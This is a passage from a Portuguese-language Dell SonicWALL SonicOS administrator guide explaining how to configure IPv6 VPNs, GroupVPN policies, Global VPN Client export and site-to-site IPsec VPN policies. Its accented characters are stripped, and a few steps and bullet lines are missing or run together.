Configuraes VPN site a site na pgina 845
Criando polticas de VPN site a site na pgina 846
Controle de regra de acesso VPN adicionada automaticamente na pgina 862

Configurando VPNs para o IPv6
As VPNs do IPSec podem ser configuradas para o IPv6 de forma semelhante s VPNs do IPv4,
depois de selecionar a opo IPv6 no boto de seleo Exibir verso do IP localizado na
parte superior esquerda da pgina VPN > Configuraes.
Existem alguns recursos de VPN que atualmente no so suportadas para o IPv6, incluindo:
O IKEv2 suportado, enquanto que o IKEv1 atualmente no suportado
O GroupVPN no suportado
O DHCP sobre VPN no suportado.

Ao configurar uma poltica de VPN no IPv6 na guia Geral, os gateways devem ser configurados
usando endereos IPv6. O FQDN no suportado. Ao configurar a autenticao IKE, os
endereos IPv6 podem ser usados p ara os IDs de IKE local e de ponto.
Nota O DHCP sobre VPN e o Servidor L2TP no so suportados para o IPv6.
Na guia Rede da poltica de VPN, os objetos do endereo IPv6 (ou grupos de endereos que
contenham somente objetos do endereo IPv6) devem ser selecionados sem relao Rede
local e Rede remota.
Como o DHCP sobre VPN no suportado, as opes do DHCP para a rede protegida no
esto disponveis.
A opo Qualquer endereo para Redes locais e a opo Todos os tneis para Redes
remotas so removidas. Selecione um objeto de endereo da Rede IPv6 todo zero que poderia
ser selecionado para a mesma funcionalidade e comportamento.
Na guia Propostas, a configurao idntica para o IPv6 e IPv4, exceto pelo fato de que o
IPv6 s suporta o modo do IKEv2.
Na guia Avanado, somente Habilitar keep alive e as Configuraes do IKEv2 podem ser
configuradas para as polticas de VPN do IPv6.
Nota Como uma interface pode ter vrios endereos IPv6, s vezes, o endereo local do tnel
pode variar periodicamente. Se o usurio precisar de um endereo IP consistente, configure
a poltica de VPN que ser vinculada a uma interface em vez de uma Zona e especifique o
endereo manualmente. O endereo deve ser um dos endereos IPv6 dessa interface.

Configurando polticas do GroupVPN
As polticas de GroupVPN facilitam a configurao e implementao de vrios Global VPN
Clients pelo administrador do firewall. O GroupVPN s est disponvel para Global VPN
Clients e recomendvel usar certificados XAUTH/RADIUS ou de terceiros em conjunto com
a VPN de Grupo para segurana adicional.
Para obter mais informaes sobre o Global VPN Clients, consulte o Guia do administrador
do Dell SonicWALL Global VPN Client.
Na pgina Rede > Zonas, possvel criar polticas de GroupVPN para todas as zonas. O
SonicOS fornece duas polticas de GroupVPN padro para as zonas WAN e WLAN, visto que,
geralmente, so as zonas menos confiveis. Essas duas polticas de GroupVPN padro esto
listadas no painel Polticas de VPN na pgina VPN > Configuraes:
GroupVPN de WAN
GroupVPN de WLAN
Na caixa de dilogo Poltica de VPN, no menu Mtodo de autenticao, possvel escolher
a opo IKE usando segredo pr-compartilhado ou a opo IKE usando certificados de
terceiros para o Modo de criao de chaves de IPsec.
O SonicOS oferece suporte a criao e o gerenciamento de VPNs IPsec.
Configurando o GroupVPN com IKE usando o segredo pr-compartilhado na zona de

WAN
Para configurar o GroupVPN de WAN, siga estas etapas:
Etapa 1 Clique no cone de edio para a entrada GroupVPN de WAN. A caixa de dilogo Poltica de
VPN exibida.
Etapa 2 Na guia Geral, IKE usando segredo pr-compartilhado a configurao padro para o
Mtodo de autenticao. Um segredo compartilhado gerado automaticamente pelo firewall
no campo Segredo compartilhado ou possvel gerar seu prprio segredo compartilhado. Os
Segredos compartilhados devem ter pelo menos quatro caracteres. No possvel alterar o
nome de qualquer poltica de GroupVPN.
Etapa 3 Clique na guia Propostas para continuar o processo de configurao.
Etapa 4 Na seo Proposta de IKE (fase 1), use as seguintes configuraes:
Selecione o Grupo DH no menu Grupo DH.
Nota O cliente L2TP do Windows 2000 e o cliente L2TP do Windows XP apenas podem
trabalhar com o Grupo DH 2. Eles so incompatveis com os Grupos DH 1 e 5.

Selecione 3DES, AES-128 ou AES-256 no menu Criptografia.
Selecione o mtodo de autenticao desejado no menu Autenticao.
Insira um valor no campo Vida til (segundos). A configurao padro de 28800 fora
o tnel a renegociar e trocar as chaves a cada 8 horas.
Etapa 5 Na seo Proposta de IPsec (fase 2), selecione as configuraes a seguir:
Selecione o protocolo desejado no menu Protocolo.
Selecione Habilitar segredo de encaminhamento perfeito, se desejar uma troca de
chave Diffie-Hellman adicional como uma camada de segurana adicionada. Selecione
Grupo 2 no menu Grupo DH.
Etapa 7 Selecione qualquer uma das seguintes configuraes opcionais que deseja aplicar poltica
de GroupVPN:
Desabilitar anti-retransmisso do IPsec Previne que os pacotes com nmeros de
sequncia duplicados sejam descartados.
Habilitar difuso seletiva de rede do Windows (NetBIOS) - permite o acesso a
recursos de rede remota navegando no ambiente de rede do Windows.
Habilitar difuso seletiva - habilita o trfego de difuso seletiva de IP, como o fluxo
de udio (incluindo VoIP) e aplicativos de vdeo, para passar atravs do tnel de VPN.
Aceitar mltiplas propostas para clientes Permite que mltiplas propostas para
clientes, como a Proposta do IKE (Fase 1) ou a Proposta do IKE (Fase 2), sejam
aceitas.
Gerenciamento por meio deste SA: - Se estiver usando a poltica de VPN para
gerenciar o firewall, selecione o mtodo de gerenciamento, HTTP ou HTTPS.
Gateway padro - permite que o administrador de rede especifique o endereo IP da
rota de rede padro para a entrada de pacotes IPsec para esta poltica de VPN. Os
pacotes de entrada so decodificados pelo firewall e comparados rotas estticas
configuradas no firewall. Como os pacotes podem ter qualquer destino de endereo IP,
impossvel configurar rotas estticas suficientes para lidar com o trfego. Para os
pacotes recebidos por meio de um tnel IPsec, o firewall procura uma rota. Se
nenhuma rota for encontrada, o dispositivo de segurana verificar se h um gateway
padro. Se for detectado um gateway padro, o pacote ser roteado atravs do
gateway. Caso contrrio, o pacote ser descartado.
Autenticao de cliente
Exigir autenticao de clientes VPN por meio de XAUTH - requer que todo o trfego
de entrada neste tnel de VPN seja de um usurio autenticado. O trfego no
autenticado no permitido no tnel de VPN. O grupo Usurios confiveis

selecionado por padro. possvel selecionar outro grupo de usurios ou Todos em
Grupo de usurios para usurios XAUTH no menu Grupo de usurios para
usurios XAUTH.
Permitir o acesso de cliente VPN no autenticado - permite habilitar o acesso de
cliente VPN no autenticado. Se voc desmarcar Exigir autenticao de clientes
VPN por meio de XAUTH, o menu Permitir acesso de cliente VPN no autenticado
ser ativado. Selecione um objeto de endereo ou grupo de endereos no menu de
opes predefinidas ou selecione Criar novo objeto de endereo ou Criar novo
grupo de endereos para criar um novo.
Etapa 8 Clique na guia Cliente, selecione qualquer uma das configuraes a seguir que desejar aplicar
poltica de GroupVPN.
Cache de nome de usurio e senha

Armazenar em cache o nome de usurio e senha XAUTH no Cliente - permite que
o Global VPN Client armazene em cache o nome de usurio e a senha.
Nunca - o Global VPN Client no tem permisso de armazenar em cache o nome
de usurio e a senha. Ser solicitado ao usurio um nome de usurio e senha,
quando a conexo for habilitada e tambm a cada vez que houver uma recriao
de chave IKE fase 1.
Sesso nica - o nome de usurio e senha do usurio do Global VPN Client ser
solicitado a cada vez que a conexo for habilitada e ser vlido at que a conexo
seja desabilitada. O nome de usurio e a senha usado atravs da recriao de
chave IKE fase 1.
Sempre - o nome de usurio e senha do usurio do Global VPN Client ser
solicitado apenas uma vez, quando a conexo estiver habilitada. Quando
solicitado, o usurio ter a opo de armazenar em cache o nome de usurio e a
senha.
Conexes de cliente
Configuraes do adaptador virtual - o uso do adaptador Virtual pelo GVC (Global
VPN Client) dependente de um servidor DHCP, o SonicOS interno ou um servidor
DHCP externo especificado, para alocar endereos para o adaptador virtual. Em casos
em que o endereamento previsvel era um requisito, necessrio obter o endereo
MAC do adaptador virtual e criar uma reserva de concesso DHCP. Para reduzir a
sobrecarga administrativa de fornecimento previsvel de endereamento do adaptador
virtual, possvel configurar o GroupVPN para aceitar o endereamento esttico da
configurao de IP do adaptador virtual. Este recurso requer o uso do SonicWALL
GVC.
Nenhum - um adaptador virtual no ser usado por esta conexo de GroupVPN.
Concesso de DHCP - o adaptador virtual obter sua configurao de IP apenas
do servidor DHCP, conforme configurar na pgina VPN > DHCP sobre VPN.
Concesso de DHCP ou configurao manual - quando o GVC se conectar ao
firewall, a poltica do firewall instruir o GVC a usar um adaptador virtual, mas as
mensagens DHCP sero suprimidas, se o adaptador Virtual tiver sido configurado
manualmente. O valor configurado registrado pelo firewall, para que ele possa
transmitir por proxy o ARP para o endereo IP atribudo manualmente. Por design,
no h atualmente nenhuma limitao nas atribuies de endereo IP para o
adaptador virtual. Apenas os endereos estticos duplicados no so permitidos.
Permitir conexes a - o trfego de rede do cliente que corresponde s redes de
destino de cada gateway enviado atravs do tnel de VPN desse gateway especfico.

Apenas este gateway - permite que uma nica conexo seja ativada de cada vez.
O trfego que corresponde s redes de destino conforme especificado na poltica
do gateway enviado atravs do tnel de VPN. Se essa opo for selecionada com
Definir rota padro como este gateway, o trfego da Internet tambm ser enviado
atravs do tnel de VPN. Se essa opo for selecionada sem selecionar Definir
rota padro como este gateway, o trfego da Internet ser bloqueado.
Todos os gateways seguros - permite que uma ou mais conexes sejam
habilitadas ao mesmo tempo. O trfego que corresponde s redes de destino de
cada gateway enviado atravs do tnel de VPN desse gateway especfico. Se
essa opo for selecionada junto com Definir rota padro como este gateway, o
trfego da Internet tambm enviado atravs do tnel de VPN. Se essa opo for
selecionada sem Definir rota padro como este gateway, o trfego da Internet
ser bloqueado. Apenas um dos vrios gateways pode ter Definir rota padro
como este gateway habilitado.
Tneis de diviso - permite que o usurio VPN tenha a conectividade de Internet
local e a conectividade de VPN.
Definir rota padro como este gateway - habilite esta caixa de seleo, se todas as
conexes de VPN remota acessarem a Internet atravs deste tnel de VPN. Apenas
possvel configurar uma poltica de VPN para usar essa configurao.
Provisionamento inicial de cliente

Usar chave padro para provisionamento de cliente simples - usa o Modo
agressivo para a troca inicial com o gateway e os clientes VPN utilizam uma chave
padro pr-compartilhada para autenticao.
Configurando o GroupVPN com IKE usando certificados de terceiros

Para configurar o GroupVPN com IKE usando certificados de terceiros, siga estas etapas:
Cuidado Antes de configurar o GroupVPN com IKE usando certificados de terceiros, os certificados
devem ser instalados no firewall.
Etapa 1 Na pgina VPN > Configuraes clique no cone de edio em Configurar. A janela Poltica
de VPN exibida.
Etapa 2 Na seo Poltica de segurana, selecione IKE usando certificados de terceiros no menu
Mtodo de autenticao. Por padro, o nome da poltica de VPN GroupVPN e no pode
ser alterado.
Etapa 3 Selecione um certificado para o firewall no menu Certificado de gateway.
Etapa 4 Selecione um dos seguintes tipos de ID de mesmo nvel tipos no menu Tipo de ID de mesmo
nvel:
ID de e-mail ID e Nome de domnio - os tipos ID de e-mail e Nome de domnio
baseiam-se no campo Nome alternativo do assunto do certificado, que no est
contido em todos os certificados, por padro. Se o certificado no contiver um campo
Nome alternativo do assunto, este filtro no funcionar. Os filtros ID de e-mail e Nome
de domnio podem conter uma cadeia de caracteres ou uma cadeia parcial de
caracteres que identifica o intervalo aceitvel necessrio. As cadeias de caracteres
inseridas no diferenciam maisculas de minsculas e podem conter os caracteres
curingas * (para mais de 1 caractere) e? (para um nico caractere). Por exemplo, a

cadeia de caracteres *@sonicwall.com quando ID de e-mail estiver selecionado,
permitir que qualquer pessoa com um endereo de e-mail que seja finalizado com
sonicwall.com tenha acesso; a cadeia de caracteres *sv.us.sonicwall.com quando o
Nome de domnio estiver selecionado, permitir que qualquer pessoa com um nome
de domnio que seja finalizado com sv.us.sonicwall.com tenha acesso.
Nome distinto - com base no campo Nome distinto do assunto de certificados, que
est contido em todos os certificados, por padro. O formato de qualquer Nome distinto
do assunto determinado pela autoridade emissora de certificado. Os campos comuns
so Pas (C=), organizao (O=), unidade organizacional (UO=), nome comum (CN=),
localidade (L=) e variam de acordo com a autoridade emissora de certificado. O campo
Nome distinto do assunto real em um certificado X.509 um objeto binrio que deve
ser convertido em uma cadeia de caracteres para fins de correspondncia. Os campos
so separados pelo caractere de barra invertida, por exemplo: /C=US/O=SonicWALL,
Inc./OU=TechPubs/CN=Joe Pub
At trs unidades organizacionais podem ser especificadas. O uso
c=*;o=*;ou=*;ou=*;ou=*;cn=*. A entrada final no precisa conter uma ponto e
vrgula. Deve-se inserir pelo menos uma entrada, ou seja, c=us.
Etapa 5 Insira o filtro de ID de mesmo nvel no campo Filtro de ID de mesmo nvel.
Etapa 6 Verifique Permitir apenas certificados de mesmo nvel assinados pelo emissor do
gateway para especificar que certificados de mesmo nvel devem ser assinados pelo emissor
especificado no menu Certificado de gateway.
Etapa 7 Clique na guia Propostas.
Etapa 8 Na seo Proposta de IKE (fase 1), selecione as configuraes a seguir:
Selecione o Grupo DH no menu Grupo DH.

Etapa 10 Clique na guia Avanado e selecione qualquer uma das seguintes configuraes opcionais
que desejar aplicar Poltica de GroupVPN:

Habilitar difuso seletiva de rede do Windows (NetBIOS) - permite o acesso aos
Habilitar difuso seletiva - habilita o trfego de difuso seletiva de IP, como o fluxo
de udio (incluindo VoIP) e aplicativos de vdeo, para passar atravs do tnel de VPN.
Gerenciamento por meio deste SA - se estiver usando a poltica de VPN para
gerenciar o firewall, selecione o mtodo de gerenciamento, HTTP ou HTTPS.
Gateway padro - usado em um site central em conjunto com um site remoto usando
a caixa de seleo Rotear todo o trfego da Internet atravs deste SA. O gateway
da LAN padro permite que o administrador da rede especifique o endereo IP da rota
da LAN padro para entrada de pacotes IPsec para esta SA. Os pacotes de entrada
so decodificados pelo firewall e comparados rotas estticas configuradas no
firewall. Como os pacotes podem ter qualquer destino de endereo IP, impossvel
configurar rotas estticas suficientes para lidar com o trfego. Para pacotes recebidos
atravs de um tnel IPsec, o firewall pesquisa uma rota para a LAN. Se nenhuma rota
for encontrada, o firewall verificar um gateway da LAN padro. Se um gateway da
LAN padro for detectado, o pacote ser roteado atravs do gateway. Caso contrrio,
o pacote ser descartado.
Habilitar verificao de OCSP e URL do respondente OCSP - permite o uso do
OCSP (Online Certificate Status Protocol ) para verificar o status do certificado VPN e
especifica a URL na qual verificar o status do certificado. Consulte Usando o OCSP
com dispositivos de segurana de rede da Dell SonicWALL na pgina 868 em .
Exigir autenticao de clientes VPN por meio de XAUTH - requer que todo o trfego
de entrada nesta poltica de VPN seja de um usurio autenticado. O trfego no
autenticado no permitido no tnel de VPN.
Grupo de usurios para usurios XAUTH - permite selecionar um grupo de usurios
definidos para a autenticao.
Todo acesso de cliente VPN no autenticado - permite especificar segmentos de
rede para acesso do Global VPN Client no autenticado.
Etapa 11 Clique na guia Cliente e selecione qualquer uma das seguintes caixas que desejar aplicar ao
provisionamento do Global VPN Client:
Armazenar em cache o nome de usurio e senha XAUTH - permite ao Global VPN
Client armazenar em cache o nome de usurio e a senha. Selecionar de:
Nunca - o Global VPN Client no tem permisso de armazenar em cache o nome
de usurio e a senha. Ser solicitado ao usurio um nome de usurio e senha,
quando a conexo for habilitada e tambm a cada vez que houver uma recriao
de chave IKE fase 1.
Sesso nica - ser solicitado ao usurio o nome de usurio e senha, quando a
conexo for habilitada e ser vlido at que a conexo seja desabilitada. Este
nome de usurio e senha usado atravs da recriao de chave IKE fase 1.
Sempre - ser solicitado ao usurio o nome de usurio e senha apenas uma vez,
quando a conexo estiver habilitada. Quando solicitado, o usurio ter a opo de
armazenar em cache o nome de usurio e a senha.
Configuraes do adaptador virtual - o uso do adaptador Virtual pelo GVC (Global
VPN Client) dependente de um servidor DHCP, o SonicOS interno ou um servidor
DHCP externo especificado, para alocar endereos para o adaptador virtual. Em casos
em que o endereamento previsvel era um requisito, necessrio obter o endereo
MAC do adaptador virtual e criar uma reserva de concesso DHCP. Para reduzir a
sobrecarga administrativa de fornecimento previsvel de endereamento do adaptador

virtual, possvel configurar o GroupVPN para aceitar o endereamento esttico da
configurao de IP do adaptador virtual. Este recurso requer o uso do SonicWALL
GVC.
Nenhum - um adaptador virtual no ser usado por esta conexo de GroupVPN.
Concesso de DHCP - o adaptador virtual obter sua configurao de IP apenas
do servidor DHCP, conforme configurar na pgina VPN > DHCP sobre VPN.
Concesso de DHCP ou configurao manual - quando o GVC se conectar ao
firewall, a poltica do firewall instruir o GVC a usar um adaptador virtual, mas as
mensagens DHCP sero suprimidas, se o adaptador Virtual tiver sido configurado
manualmente. O valor configurado registrado pelo firewall, para que ele possa
transmitir por proxy o ARP para o endereo IP atribudo manualmente. Por design,
no h atualmente nenhuma limitao nas atribuies de endereo IP para o
adaptador virtual. Apenas os endereos estticos duplicados no so permitidos.
Permitir conexes a - o trfego de rede do cliente que corresponde s redes de
destino de cada gateway enviado atravs do tnel de VPN desse gateway especfico.
Apenas este gateway - permite que uma nica conexo seja ativada de cada vez.
O trfego que corresponde s redes de destino conforme especificado na poltica
do gateway enviado atravs do tnel de VPN. Se essa opo for selecionada com
Definir rota padro como este gateway, o trfego da Internet tambm ser enviado
atravs do tnel de VPN. Se essa opo for selecionada sem selecionar Definir
rota padro como este gateway, o trfego da Internet ser bloqueado.
Todos os gateways seguros - permite que uma ou mais conexes sejam
habilitadas ao mesmo tempo. O trfego que corresponde s redes de destino de
cada gateway enviado atravs do tnel de VPN desse gateway especfico. Se
essa opo for selecionada junto com Definir rota padro como este gateway, o
trfego da Internet tambm enviado atravs do tnel de VPN. Se essa opo for
selecionada sem Definir rota padro como este gateway, o trfego da Internet
ser bloqueado. Apenas um dos vrios gateways pode ter Definir rota padro
como este gateway habilitado.
Tneis de diviso - permite que o usurio VPN tenha a conectividade de Internet
local e a conectividade de VPN.
Definir rota padro como este gateway - habilitar esta caixa de seleo, se todas
as conexes de VPN remota acessarem a Internet por meio deste SA. Apenas
possvel configurar uma SA para usar essa configurao.
Usar chave padro para provisionamento de cliente simples - usa o Modo
agressivo para a troca inicial com o gateway e os clientes VPN utilizam uma chave
padro pr-compartilhada para autenticao.
Exportando a poltica de cliente VPN

Se voc desejar exportar as definies de configurao do Global VPN Client para um arquivo
para que os usurios importem para seus Global VPN Clients, siga estas instrues:
Cuidado O GroupVPN SA deve ser habilitado no firewall para exportar um arquivo de configurao.

Etapa 1 Clique no cone Disco na coluna Configurar para a entrada de GroupVPN na tabela Polticas
de VPN. A janela Exportar poltica de cliente VPN exibida.
Etapa 2 Formato rcf necessrio para o SonicWALL Global VPN Clients selecionado, por padro.
Os arquivos salvos no formato rcf podem ser criptografados com senha. O firewall fornece um
nome de arquivo padro para o arquivo de configurao, que voc pode alterar.
Etapa 3 Clique em Sim. A janela Exportao de poltica de VPN exibida.
Etapa 4 Digite uma senha no campo Senha e insira-a novamente no campo Confirmar Senha, se
desejar criptografar o arquivo exportado. Se voc escolher no inserir uma senha, o arquivo
exportado no ser criptografado.
Etapa 5 Clique em Enviar. Se voc no inseriu uma senha, uma mensagem ser exibida, confirmando
sua escolha.
Etapa 6 Clique em OK. possvel alterar o arquivo de configurao antes de salvar.
Etapa 7 Salve o arquivo
Etapa 8 Clique em Fechar.
O arquivo pode ser salvo ou enviado eletronicamente aos usurios remotos para configurar
seus Global VPN Clients.
Configuraes VPN site a site

Ao projetar conexes de VPN, certifique-se de todos os documentos pertinentes s
informaes de endereamento IP e crie um diagrama de rede para usar como uma referncia.
Uma folha de planejamento de amostra fornecida na prxima pgina. O firewall deve ter um
Endereo IP de WAN rotevel, se ele for esttico ou dinmico. Em uma rede VPN com
endereos IP estticos e dinmicos, o gateway de VPN com o endereo dinmico deve iniciar
a conexo de VPN.
As configuraes de VPN site a site podem incluir as seguintes opes:
Filiais (Gateway para Gateway) - uma SonicWALL configurada para se conectar a outra
SonicWALL por meio de um tnel de VPN. Ou, uma SonicWALL est configurada para se
conectar atravs de IPsec ao firewall de outro fabricante.

Design de Hub e Spoke - todos os gateways do SonicWALL VPN so configurados para
conectarem-se a um ponto central, como um firewall corporativo. O hub deve ter um
endereo IP esttico, mas os spokes podem ter endereos IP dinmicos. Se o spokes
forem dinmicos, o hub deve ser um dispositivo de segurana de rede da Dell SonicWALL.
Design de malha - todos os sites que se conectam a outros sites. Todos os sites devem
ter endereos IP estticos
Criando polticas de VPN site a site

possvel criar ou modificar polticas de VPN existentes usando a janela Poltica de VPN.
Clicar no boto Adicionar na tabela Polticas de VPN exibe a janela Poltica de VPN para
configurar as seguintes polticas de VPN de modo de criao de chave IPsec:
Configurando uma Poltica de VPN com IKE usando segredo pr-compartilhado na
pgina 846
Configurando uma poltica de VPN usando a chave manual na pgina 852
Configurando uma poltica de VPN com IKE usando um certificado de terceiros na
pgina 855
Esta seo tambm contm informaes sobre como configurar uma rota esttica para atuar
como um failover, no caso do tnel de VPN ficar inativo. Consulte Configurando failover de
VPN para uma rota esttica na pgina 858 para obter mais informaes.
Configurando uma Poltica de VPN com IKE usando segredo pr-compartilhado

Para configurar uma Poltica de VPN usando IKE (troca de chave de Internet), siga as etapas
abaixo:
Etapa 1 Acesse a pgina VPN > Configuraes.

A pgina Poltica de VPN exibida.

Etapa 2 Clique no boto Adicionar.
A caixa de dilogo Poltica de VPN ser exibida.
Etapa 3 No menu Tipo de poltica, selecione o tipo de poltica que deseja criar.
Etapa 4 Na guia Geral, selecione IKE usando segredo pr-compartilhado no menu Mtodo de
autenticao.
Etapa 5 Insira um nome para a poltica no campo Nome.
Etapa 6 Insira o nome de host ou o endereo IP da conexo remota no campo Nome ou endereo do
gateway primrio do IPsec.
Etapa 7 Se o dispositivo de VPN remota oferece suporte a mais de um ponto terminal, possvel inserir
opcionalmente um segundo nome de host ou endereo IP de conexo remota no campo Nome
ou endereo do gateway secundrio do IPsec.
Etapa 8 Insira uma senha de Segredo compartilhado a ser usada para configurar a associao de
segurana dos campos Segredo compartilhado e Confirmar segredo compartilhado. O
segredo compartilhado deve ter pelo menos quarto caracteres e deve ser composto por
nmeros e letras.
Opcionalmente, especifique um ID de IKE local (opcional) e um ID de IKE de mesmo nvel
(opcional) para esta poltica. Por padro, o Endereo IP (ID_IPv4_ADDR) usado para
negociaes de Modo principal e o firewall Identificador (ID_USER_FQDN) usado para o
Modo agressivo.
Etapa 9 Clique na guia Rede.
Etapa 10 Em Redes locais, selecione uma rede local em Escolher rede local na lista, se uma rede
local especfica puder acessar o tnel de VPN. Se os hosts neste lado da conexo de VPN
estiverem obtendo seu endereamento de um servidor DHCP no lado do tnel remoto,
selecione Rede local obtm endereos IP usando DHCP por meio deste tnel de VPN. Se

o trfego puder ser originado de qualquer rede local, selecione Qualquer endereo. Use esta
opo, se um par tiver selecionado Usar este tnel de VPN como rota padro para todo o
trfego de Internet.
Nota No h suporte para DHCP sobre VPN com o IKEv2.
Etapa 11 Em Redes de destino, selecione Usar este tnel de VPN como rota padro para todo o
trfego de Internet, se o trfego de qualquer usurio local no puder deixar o firewall, a menos
que ele esteja criptografado. Apenas possvel configurar uma SA para usar essa
configurao. Se o lado remoto desta conexo de VPN dever obter seu endereamento de um
servidor DHCP neste lado do tnel, selecione Rede de destino obtm endereos IP usando
o servidor DHCP por meio desse tnel. Como alternativa, selecione Escolher rede de
destino na lista e selecione grupo ou objeto de endereo.
Etapa 12 Clique em Propostas.
Etapa 13 Em Proposta de IKE (fase 1), selecione Modo principal, Modo agressivo ou IKEv2 no menu
Troca. Geralmente, o Modo agressivo ser usado quando o endereamento de WAN for
atribudo dinamicamente. O IKEv2 faz com que toda a negociao ocorra por meio de
protocolos de IKE v2, em vez de usar o IKE fase 1 e fase 2. Se voc usar o IKE v2, ambas as
extremidades do tnel de VPN devero usar o IKE v2.
Etapa 14 Em Proposta de IKE (fase 1), os valores padro para Grupo DH, criptografia, Autenticao
e Durao so aceitveis para a maioria das configuraes de VPN. Certifique-se de que os
valores de fase 1 do outro lado do tnel sejam configurados para correspondncia. Tambm
possvel escolher AES-128, AES-192, ou AES-256 no menu Autenticao, em vez de 3DES
para segurana de autenticao aprimorada.
Etapa 15 Em proposta de IPsec (fase 2), os valores padro para Protocolo, Criptografia,
Autenticao, Habilitar segredo de encaminhamento perfeito, Grupo DH e Durao so
aceitos para a maioria das configuraes de SA de VPN. Certifique-se de que os valores de
fase 2 do outro lado do tnel sejam configurados para correspondncia.

que deseja aplicar poltica de VPN:
Se voc tiver selecionado Modo principal ou Modo agressivo na guia Propostas:

Selecione Habilitar keep alive para usar mensagens de pulsao entre pares
neste tnel de VPN. Se uma extremidade do tnel falhar, o uso de Keepalives
permitir a renegociao automtica do tnel, uma vez que os lados ficarem
disponveis novamente sem precisar aguardar a durao proposta para serem
expirados.
Por padro, a configurao Suprimir criao automtica de regras de acesso
para poltica de VPN no habilitada para permitir que o trfego de VPN
atravesse as zonas apropriadas.
Para exigir a autenticao XAUTH pelos usurios antes de permitir que o trfego
atravesse este tnel, selecione Exigir a autenticao de cliente VPN por XAUTH
e selecione um grupo de usurios para especificar os usurios permitidos no
Grupo de usurios para XAUTH.
Selecione Habilitar difuso seletiva de rede do Windows (NetBIOS) para
permitir o acesso a recursos de rede remota navegando no ambiente de Rede do
Windows.
Selecione Habilitar difuso seletiva para permitir que o trfego de difuso
seletiva IP, como o fluxo de udio (incluindo VoIP) e aplicativos de vdeo, passe por
meio do tnel de VPN.
Selecione Permitir acelerao para habilitar o redirecionamento de trfego que
corresponde esta poltica ao dispositivo WAN Acceleration (WXA).

Selecione Aplicar polticas de NAT, se desejar que o firewall traduza ambas as
redes, local e remota, que se comunicam por meio deste tnel de VPN. Para
executar a traduo de endereo de rede na rede local, selecione ou crie um objeto
de endereo no menu Rede local traduzida. Para traduzir a rede remota,
selecione ou crie um objeto de endereo no menu Rede remota traduzida.
Geralmente, se a NAT for necessria em um tnel, local ou remoto dever ser
traduzido, mas no ambos. Aplicar polticas de NAT especificamente til em
casos em que ambos os lados de um tnel usam as mesmas sub-redes ou as sub-
redes sobrepostas.
Para gerenciar o SonicWALL local por meio do tnel de VPN, selecione HTTPS em
Gerenciamento por meio deste SA. Selecione HTTP, HTTPS ou ambos no login
do usurio por meio deste SA para permitir que os usurios efetuem login usando
SA.
Se desejar usar um roteador na LAN para trfego inserindo este tnel destinado a
uma sub-rede desconhecida, por exemplo, se voc tiver configurado o outro lado
como Usar este tnel de VPN como rota padro para todo o trfego de
Internet, dever inserir o endereo IP do roteador no campo Gateway de LAN
padro (opcional).
Selecione uma interface ou zona no menu Poltica de VPN ligada a. A WAN de
zona ser a seleo preferencial, se voc estiver usando o balanceamento de
carga de WAN e desejar permitir que a VPN use qualquer interface de WAN.
Se voc tiver selecionado IKEv2 na guia Propostas:
Selecione Habilitar keep alive para usar mensagens de pulsao entre pares
neste tnel de VPN. Se uma extremidade do tnel falhar, o uso de Keepalives
permitir a renegociao automtica do tnel, uma vez que os lados ficarem
disponveis novamente sem precisar aguardar a durao proposta para serem
expirados.
Selecione Suprimir criao automtica de regras de acesso para poltica de
VPN para desativar as regras de acesso automtico criadas entre zonas de LAN e
de VPN para esta poltica de VPN.
Selecione Habilitar difuso seletiva de rede do Windows (NetBIOS) para
permitir o acesso a recursos de rede remota navegando no ambiente de Rede do
Windows.
Selecione Habilitar difuso seletiva para permitir que o trfego de difuso
seletiva IP, como o fluxo de udio (incluindo VoIP) e aplicativos de vdeo, passe por
corresponde esta poltica ao dispositivo WAN Acceleration (WXA).
Selecione Aplicar polticas de NAT, se desejar que o firewall traduza ambas as
redes, local e remota, que se comunicam por meio deste tnel de VPN. Para
executar a traduo de endereo de rede na rede local, selecione ou crie um objeto
de endereo no menu Rede local traduzida. Para traduzir a rede remota,
selecione ou crie um objeto de endereo no menu Rede remota traduzida.
Geralmente, se a NAT for necessria em um tnel, local ou remoto dever ser
traduzido, mas no ambos. Aplicar polticas de NAT especificamente til em
casos em que ambos os lados de um tnel usam as mesmas sub-redes ou as sub-
redes sobrepostas.
Para gerenciar o SonicWALL local por meio do tnel de VPN, selecione HTTPS em
Gerenciamento por meio deste SA. Selecione HTTP, HTTPS ou ambos no login
do usurio por meio deste SA para permitir que os usurios efetuem login usando
SA.

Insira o Gateway de LAN padro, se voc tiver mais de um gateway e desejar que
ele sempre seja usado primeiro.
Selecione uma interface ou zona no menu Poltica de VPN ligada a. A WAN de
zona ser a seleo preferencial, se voc estiver usando o balanceamento de
carga de WAN e desejar permitir que a VPN use qualquer interface de WAN.
Por padro, em Configuraes IKEv2 (visvel apenas se voc tiver selecionado
IKEv2 para Troca na guia Propostas), a caixa de seleo No enviar pacote de
acionamento durante a negociao SA de IKE estar desmarcada e dever ser
selecionada apenas quando necessrio para fins de interoperabilidade.
O termo pacote de acionamento refere-se ao uso de cargas iniciais de seletor de
trfego preenchidas com os endereos IP do pacote que fez com que a negociao
SA iniciasse. prtica recomendvel incluir pacotes de acionamento para ajudar
o Respondente de IKEv2 na seleo dos intervalos corretos do endereo IP
protegido de seu Banco de dados de poltica de segurana. Nem todas as
implementaes oferecem suporte esse recurso, portanto, pode ser apropriado
desabilitar a incluso de pacotes de acionamento para alguns IKE de mesmo nvel.
Selecione uma ou as duas opes a seguir para a poltica de VPN de IKEv2:
Aceitar tipo de certificado de Hash e URL
Enviar tipo de certificado URL e Hash
Selecione essas opes, se os dispositivos puderem enviar e processar URLs de
hash e de certificado, em vez dos prprios certificados. Usar as seguintes opes
reduz o tamanho das mensagens trocadas.
Quando a opo Aceitar tipo de certificado de Hash e URL estiver selecionada,
o firewall enviar uma mensagem HTTP_CERT_LOOKUP_SUPPORTED ao
dispositivo de mesmo nvel. Se o dispositivo de mesmo nvel responder, enviando
um certificado "Hash e URL de X.509c", o firewall poder autenticar e estabelecer
um tnel entre os dois dispositivos.
Quando a opo Enviar tipo de certificado de Hash e URL estiver selecionada,
o firewall, ao receber uma mensagem de HTTP_CERT_LOOKUP_SUPPORTED,
enviar um certificado "Hash e URL de X.509c" ao solicitante.
Em uma VPN, os dois firewalls de mesmo nvel (FW1 e FW2) negociam um tnel.
Na perspectiva de FW1, FW2 o gateway remoto e vice-versa.

Configurando uma poltica de VPN usando a chave manual
Para configurar manualmente uma poltica de VPN entre os dois dispositivos da SonicWALL
usando a chave manual, siga as etapas a seguir:
Configurando o dispositivo de segurana de rede da Dell SonicWALL local
